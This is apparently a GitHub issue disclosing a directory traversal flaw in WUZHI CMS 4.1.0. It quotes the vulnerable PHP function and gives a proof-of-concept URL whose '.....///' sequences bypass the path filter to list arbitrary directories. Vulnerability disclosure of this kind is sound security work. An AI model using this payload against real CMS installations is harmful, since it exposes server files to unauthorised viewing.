Wuzhicms v4.1.0 /coreframe/app/attachment/admin/index.php hava a directory traversal Vulnerability

A directory traversal vulnerability was discovered in WUZHI CMS 4.1.0.
Directory traversal allows authenticated remote attackers to list files in any directory.
Vulnerability in /coreframe/app/attachment/admin/index.php:
```
    public function dir()
    {
        $dir = isset($GLOBALS['dir']) && trim($GLOBALS['dir']) ? str_replace(array('..\\', '../', './', '.\\'), '', trim($GLOBALS['dir'])) : '';
        $dir = str_ireplace(array('%2F', '//'), '/', $dir);
        $lists = glob(ATTACHMENT_ROOT . $dir . '/' . '*');
        if (!empty($lists)) rsort($lists);
        $cur_dir = str_replace(array(WWW_ROOT, DIRECTORY_SEPARATOR . DIRECTORY_SEPARATOR), array('', DIRECTORY_SEPARATOR), ATTACHMENT_ROOT . $dir . '/');
        include $this->template('dir', M);
    }
```
Even if the "str_replace" function filters some characters, it can still bypass the blacklist with ".....///"

1.Log in as admin
![image](https://user-images.githubusercontent.com/57355558/178402193-9f2a7884-3e5f-4b7d-b82a-b19a5a874b29.png)
2.Vulnerability trigger point
`http://www.test.com/index.php?m=attachment&f=index&_su=wuzhicms&v=dir&dir=/.....///.....///.....///.....///`
![image](https://user-images.githubusercontent.com/57355558/178402374-02b63c36-c778-42b7-8b5d-003c60ff2732.png)


Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Wuzhicms v4.1.0 /coreframe/app/attachment/admin/index.php hava a directory traversal Vulnerability #202

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development